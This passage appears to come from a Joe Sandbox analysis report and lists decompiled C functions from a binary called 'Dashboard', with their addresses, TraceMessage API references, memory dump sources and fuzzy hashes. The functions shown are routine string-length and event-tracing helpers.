                                                                                                                    						_t11 =  &(_t11[2]);
                                                                                                                    					} while (_t16 != 0);
                                                                                                                    					_t10 = (_t11 - _t19 >> 1) + (_t11 - _t19 >> 1) + 2;
                                                                                                                    					goto L8;
                                                                                                                    				}
                                                                                                                    				_push(0xe);
                                                                                                                    				goto L7;
                                                                                                                    			}








                                                                                                                    0x01008f09
                                                                                                                    0x01008f0e
                                                                                                                    0x01008f35
                                                                                                                    0x01008f37
                                                                                                                    0x01008f37
                                                                                                                    0x01008f38
                                                                                                                    0x01008f3a
                                                                                                                    0x01008f49
                                                                                                                    0x01008f3c
                                                                                                                    0x01008f40
                                                                                                                    0x01008f42
                                                                                                                    0x01008f42
                                                                                                                    0x01008f40
                                                                                                                    0x01008f4e
                                                                                                                    0x01008f50
                                                                                                                    0x01008f55
                                                                                                                    0x01008f56
                                                                                                                    0x01008f57
                                                                                                                    0x01008f58
                                                                                                                    0x01008f5b
                                                                                                                    0x01008f5e
                                                                                                                    0x01008f60
                                                                                                                    0x01008f63
                                                                                                                    0x01008f66
                                                                                                                    0x01008f6f
                                                                                                                    0x01008f6f
                                                                                                                    0x01008f14
                                                                                                                    0x01008f1a
                                                                                                                    0x01008f1d
                                                                                                                    0x01008f20
                                                                                                                    0x01008f20
                                                                                                                    0x01008f24
                                                                                                                    0x01008f25
                                                                                                                    0x01008f2e
                                                                                                                    0x00000000
                                                                                                                    0x01008f32
                                                                                                                    0x01008f16
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,?,00000004,00000000), ref: 01008F66
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTrace
                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                    • Opcode ID: 8939b155df5251d13cbd5006e5e94e9137ab6b9bcc9f1b520cb0581d12cf794a
                                                                                                                    • Instruction ID: 80b859377621651450f1c79f4c8cd24ec91a27224500144c5756cc1ca6af00b1
                                                                                                                    • Opcode Fuzzy Hash: 8939b155df5251d13cbd5006e5e94e9137ab6b9bcc9f1b520cb0581d12cf794a
                                                                                                                    • Instruction Fuzzy Hash: 35016232A4020AAAFB175E18CC15FB7376BFB94750F04C05AFB855A1D5D7B0DA918781
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 50%
                                                                                                                    			E01008F77(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, char* _a24) {
                                                                                                                    				void* _t10;
                                                                                                                    				char* _t11;
                                                                                                                    				char* _t12;
                                                                                                                    				char _t16;
                                                                                                                    				char* _t17;
                                                                                                                    				char* _t19;
                                                                                                                    
                                                                                                                    				_t17 = _a24;
                                                                                                                    				if(_t17 == 0) {
                                                                                                                    					_push(0xa);
                                                                                                                    					L7:
                                                                                                                    					_pop(_t10);
                                                                                                                    					L8:
                                                                                                                    					if(_t17 == 0) {
                                                                                                                    						_t17 = L"NULL";
                                                                                                                    					} else {
                                                                                                                    						if( *_t17 == 0) {
                                                                                                                    							_t17 = L"<NULL>";
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_push(0);
                                                                                                                    					_push(_t10);
                                                                                                                    					_push(_t17);
                                                                                                                    					_push(4);
                                                                                                                    					_t11 =  &_a20;
                                                                                                                    					_push(_t11);
                                                                                                                    					_push(_a12);
                                                                                                                    					_push(_a16);
                                                                                                                    					_push(0x2b);
                                                                                                                    					_push(_a8);
                                                                                                                    					_push(_a4);
                                                                                                                    					L01007CCA();
                                                                                                                    					return _t11;
                                                                                                                    				}
                                                                                                                    				if( *_t17 != 0) {
                                                                                                                    					_t12 = _t17;
                                                                                                                    					_t19 =  &(_t12[2]);
                                                                                                                    					do {
                                                                                                                    						_t16 =  *_t12;
                                                                                                                    						_t12 =  &(_t12[2]);
                                                                                                                    					} while (_t16 != 0);
                                                                                                                    					_t10 = (_t12 - _t19 >> 1) + (_t12 - _t19 >> 1) + 2;
                                                                                                                    					goto L8;
                                                                                                                    				}
                                                                                                                    				_push(0xe);
                                                                                                                    				goto L7;
                                                                                                                    			}









                                                                                                                    0x01008f7c
                                                                                                                    0x01008f81
                                                                                                                    0x01008fa8
                                                                                                                    0x01008faa
                                                                                                                    0x01008faa
                                                                                                                    0x01008fab
                                                                                                                    0x01008fad
                                                                                                                    0x01008fbc
                                                                                                                    0x01008faf
                                                                                                                    0x01008fb3
                                                                                                                    0x01008fb5
                                                                                                                    0x01008fb5
                                                                                                                    0x01008fb3
                                                                                                                    0x01008fc1
                                                                                                                    0x01008fc3
                                                                                                                    0x01008fc4
                                                                                                                    0x01008fc5
                                                                                                                    0x01008fc7
                                                                                                                    0x01008fca
                                                                                                                    0x01008fcb
                                                                                                                    0x01008fce
                                                                                                                    0x01008fd1
                                                                                                                    0x01008fd3
                                                                                                                    0x01008fd6
                                                                                                                    0x01008fd9
                                                                                                                    0x01008fe2
                                                                                                                    0x01008fe2
                                                                                                                    0x01008f87
                                                                                                                    0x01008f8d
                                                                                                                    0x01008f90
                                                                                                                    0x01008f93
                                                                                                                    0x01008f93
                                                                                                                    0x01008f97
                                                                                                                    0x01008f98
                                                                                                                    0x01008fa1
                                                                                                                    0x00000000
                                                                                                                    0x01008fa5
                                                                                                                    0x01008f89
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,?,?,?,00000004,NULL,0000000A,00000000), ref: 01008FD9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTrace
                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                    • Opcode ID: c7d6071a655c78495c48a96bf2576d9743c2710dbb788e9cb8cd38e5e491f908
                                                                                                                    • Instruction ID: cc904351b8ef249ffd39a5b3e5007a4b42529226bea6dfb454dc9441b02c85b6
                                                                                                                    • Opcode Fuzzy Hash: c7d6071a655c78495c48a96bf2576d9743c2710dbb788e9cb8cd38e5e491f908
                                                                                                                    • Instruction Fuzzy Hash: 08016D72A4020AAAFB175E18CC01FB7376BFB84710F14C45AFB859B5D1D7B1DAA18781
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 54%
                                                                                                                    			E01006C01(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20) {
                                                                                                                    				void* _t9;
                                                                                                                    				char* _t10;
                                                                                                                    				char _t14;
                                                                                                                    				char* _t15;
                                                                                                                    				char* _t17;
                                                                                                                    
                                                                                                                    				_t15 = _a20;
                                                                                                                    				if(_t15 == 0) {
                                                                                                                    					_push(0xa);
                                                                                                                    					L7:
                                                                                                                    					_pop(_t9);
                                                                                                                    					L8:
                                                                                                                    					if(_t15 == 0) {
                                                                                                                    						_t15 = L"NULL";
                                                                                                                    					} else {
                                                                                                                    						if( *_t15 == 0) {
                                                                                                                    							_t15 = L"<NULL>";
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_push(0);
                                                                                                                    					_push(_t9);
                                                                                                                    					_push(_t15);
                                                                                                                    					_push(_a12);
                                                                                                                    					_push(_a16);
                                                                                                                    					_push(0x2b);
                                                                                                                    					_push(_a8);
                                                                                                                    					_push(_a4);
                                                                                                                    					L01007CCA();
                                                                                                                    					return _t9;
                                                                                                                    				}
                                                                                                                    				if( *_t15 != 0) {
                                                                                                                    					_t10 = _t15;
                                                                                                                    					_t17 =  &(_t10[2]);
                                                                                                                    					do {
                                                                                                                    						_t14 =  *_t10;
                                                                                                                    						_t10 =  &(_t10[2]);
                                                                                                                    					} while (_t14 != 0);
                                                                                                                    					_t9 = (_t10 - _t17 >> 1) + (_t10 - _t17 >> 1) + 2;
                                                                                                                    					goto L8;
                                                                                                                    				}
                                                                                                                    				_push(0xe);
                                                                                                                    				goto L7;
                                                                                                                    			}








                                                                                                                    0x01006c06
                                                                                                                    0x01006c0b
                                                                                                                    0x01006c32
                                                                                                                    0x01006c34
                                                                                                                    0x01006c34
                                                                                                                    0x01006c35
                                                                                                                    0x01006c37
                                                                                                                    0x01006c46
                                                                                                                    0x01006c39
                                                                                                                    0x01006c3d
                                                                                                                    0x01006c3f
                                                                                                                    0x01006c3f
                                                                                                                    0x01006c3d
                                                                                                                    0x01006c4b
                                                                                                                    0x01006c4d
                                                                                                                    0x01006c4e
                                                                                                                    0x01006c4f
                                                                                                                    0x01006c52
                                                                                                                    0x01006c55
                                                                                                                    0x01006c57
                                                                                                                    0x01006c5a
                                                                                                                    0x01006c5d
                                                                                                                    0x01006c66
                                                                                                                    0x01006c66
                                                                                                                    0x01006c11
                                                                                                                    0x01006c17
                                                                                                                    0x01006c1a
                                                                                                                    0x01006c1d
                                                                                                                    0x01006c1d
                                                                                                                    0x01006c21
                                                                                                                    0x01006c22
                                                                                                                    0x01006c2b
                                                                                                                    0x00000000
                                                                                                                    0x01006c2f
                                                                                                                    0x01006c13
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,00000000), ref: 01006C5D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTrace
                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                    • Opcode ID: f3164116c202b094245bbc3fcf89ef5ca1fb80c82b3ebc915f3e450abbff13c8
                                                                                                                    • Instruction ID: a1a337fd346edefb4187ada91714bd135d0cfade865ca6000f32359662baf7d6
                                                                                                                    • Opcode Fuzzy Hash: f3164116c202b094245bbc3fcf89ef5ca1fb80c82b3ebc915f3e450abbff13c8
                                                                                                                    • Instruction Fuzzy Hash: 00F0A431A0020EAAFF175E088C11FB73767EB96700F04C051FAC65A1D1DB72DBA18780
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E010063ED(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr* _t24;
                                                                                                                    				void* _t35;
                                                                                                                    				void* _t40;
                                                                                                                    
                                                                                                                    				_t35 = __edx;
                                                                                                                    				_push(4);
                                                                                                                    				E0100880F(E01015A78, __ebx, __edi, __esi);
                                                                                                                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                                                    				 *((intOrPtr*)(_t40 - 4)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t40 - 0x10)) = 0;
                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)(_t40 + 8)) - 0xc)) == 0) {
                                                                                                                    					L7:
                                                                                                                    					 *((intOrPtr*)(_t40 - 0x10)) = 0x80070057;
                                                                                                                    				} else {
                                                                                                                    					_t37 = __ecx + 4;
                                                                                                                    					_t24 = E01006189(__ecx + 4, _t40 + 8);
                                                                                                                    					if(_t24 != 0xffffffff) {
                                                                                                                    						if( *((intOrPtr*)(_t40 + 0xc)) != 0) {
                                                                                                                    							goto L7;
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						_push(0x10);
                                                                                                                    						L01008948();
                                                                                                                    						if(_t24 == 0) {
                                                                                                                    							 *((intOrPtr*)(_t40 + 0xc)) = 0;
                                                                                                                    						} else {
                                                                                                                    							 *_t24 = 0;
                                                                                                                    							 *((intOrPtr*)(_t24 + 4)) = 0;
                                                                                                                    							 *((intOrPtr*)(_t24 + 8)) = 0;
                                                                                                                    							 *((intOrPtr*)(_t24 + 0xc)) = 0;
                                                                                                                    							 *((intOrPtr*)(_t40 + 0xc)) = _t24;
                                                                                                                    						}
                                                                                                                    						E01006373(_t37, _t40 + 8, _t40 + 0xc);
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				E01004925(_t39 - 0x10, _t35);
                                                                                                                    				return E010088FB( *((intOrPtr*)(_t40 - 0x10)));
                                                                                                                    			}






                                                                                                                    0x010063ed
                                                                                                                    0x010063ed
                                                                                                                    0x010063f4
                                                                                                                    0x010063f9
                                                                                                                    0x01006401
                                                                                                                    0x01006404
                                                                                                                    0x01006407
                                                                                                                    0x01006451
                                                                                                                    0x01006451
                                                                                                                    0x01006409
                                                                                                                    0x01006409
                                                                                                                    0x01006412
                                                                                                                    0x0100641a
                                                                                                                    0x0100644f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100641c
                                                                                                                    0x0100641c
                                                                                                                    0x0100641e
                                                                                                                    0x01006426
                                                                                                                    0x01006438
                                                                                                                    0x01006428
                                                                                                                    0x01006428
                                                                                                                    0x0100642a
                                                                                                                    0x0100642d
                                                                                                                    0x01006430
                                                                                                                    0x01006433
                                                                                                                    0x01006433
                                                                                                                    0x01006445
                                                                                                                    0x01006445
                                                                                                                    0x0100641a
                                                                                                                    0x0100645b
                                                                                                                    0x01006468

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@H_prolog3
                                                                                                                    • String ID: W
                                                                                                                    • API String ID: 1489479240-655174618
                                                                                                                    • Opcode ID: 82752f92a90d20f1163ca764032c228d2ba1203ee7b64816ff18d370978619e8
                                                                                                                    • Instruction ID: c52d2d7e637f1112538b85616935d98d4c50e68216f8356b20c1082d18deca0a
                                                                                                                    • Opcode Fuzzy Hash: 82752f92a90d20f1163ca764032c228d2ba1203ee7b64816ff18d370978619e8
                                                                                                                    • Instruction Fuzzy Hash: A70192B190020AAFEB12DF59C4809ECBBA2BF04220F85C56ED1999F2C1CB358605CF51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%